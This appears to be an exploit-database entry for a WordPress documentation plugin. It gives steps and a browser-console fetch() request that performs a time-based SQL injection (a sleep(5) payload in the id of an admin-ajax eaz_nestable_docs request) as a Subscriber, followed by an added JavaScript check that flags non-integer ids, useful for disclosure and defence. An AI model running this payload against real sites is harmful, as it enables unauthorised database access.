## https://sploitus.com/exploit?id=WPEX-ID:44F5A29A-05F9-40D2-80F2-6FB2BDA60D79
1. Create a document, then create some sections in it
2. Log in as Subscriber
3. Paste the following script in the browser's console, and notice it hangs for 5 seconds, indicating the injection succeeded:
```
await fetch("/wp-admin/admin-ajax.php", {
    "credentials": "include",
    "headers": {
        "content-type": "application/x-www-form-urlencoded",
    },
    "body": "action=eaz_nestable_docs&data=%5b%7b%22id%22%3a%2286'and(select*from(select(sleep(5)))a)%23%22%7d%5d",
    "method": "POST",
    "mode": "cors"
});
```
```
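For triage or a request filter, the check below inspects `admin-ajax.php` POST bodies for the `eaz_nestable_docs` action and flags any `id` in the `data` JSON that is not a plain integer. It is an added example, not part of the original advisory or the plugin's code; the function names are hypothetical, and the `children` key for nested items is an assumption about the payload shape.

```javascript
// Added example: flags eaz_nestable_docs request bodies whose "data" JSON
// carries an id that is not a plain non-negative integer.
// Assumption: nested items, if present, sit under a "children" array.
const INT_ID = /^[0-9]+$/;

// Collect every id value that is not a plain decimal integer.
function badIds(items, out = []) {
  if (!Array.isArray(items)) { out.push(items); return out; }
  for (const item of items) {
    if (item === null || typeof item !== "object") { out.push(item); continue; }
    const id = item.id;
    const ok = (Number.isInteger(id) && id >= 0) ||
               (typeof id === "string" && INT_ID.test(id));
    if (!ok) out.push(id);
    if (item.children !== undefined) badIds(item.children, out);
  }
  return out;
}

// Inspect one urlencoded request body and return a verdict object.
function inspectBody(body) {
  const params = new URLSearchParams(body);
  if (params.get("action") !== "eaz_nestable_docs") {
    return { relevant: false, suspicious: false, bad: [] };
  }
  let parsed;
  try {
    parsed = JSON.parse(params.get("data") ?? "");
  } catch {
    // Missing or malformed JSON for this action is itself worth a look.
    return { relevant: true, suspicious: true, bad: ["<unparseable data>"] };
  }
  const bad = badIds(parsed);
  return { relevant: true, suspicious: bad.length > 0, bad };
}

// Sample bodies: [0] and [2] are constructed, [1] is the body from step 3.
const samples = [
  "action=eaz_nestable_docs&data=%5B%7B%22id%22%3A%2286%22%2C%22children%22%3A%5B%7B%22id%22%3A87%7D%5D%7D%5D",
  "action=eaz_nestable_docs&data=%5b%7b%22id%22%3a%2286'and(select*from(select(sleep(5)))a)%23%22%7d%5d",
  "action=heartbeat&data=%5B%5D",
];
for (const s of samples) console.log(inspectBody(s));
```

The same integer-only rule is what a server-side fix has to enforce before the `id` reaches a query; log-side matching only helps where request bodies are actually recorded.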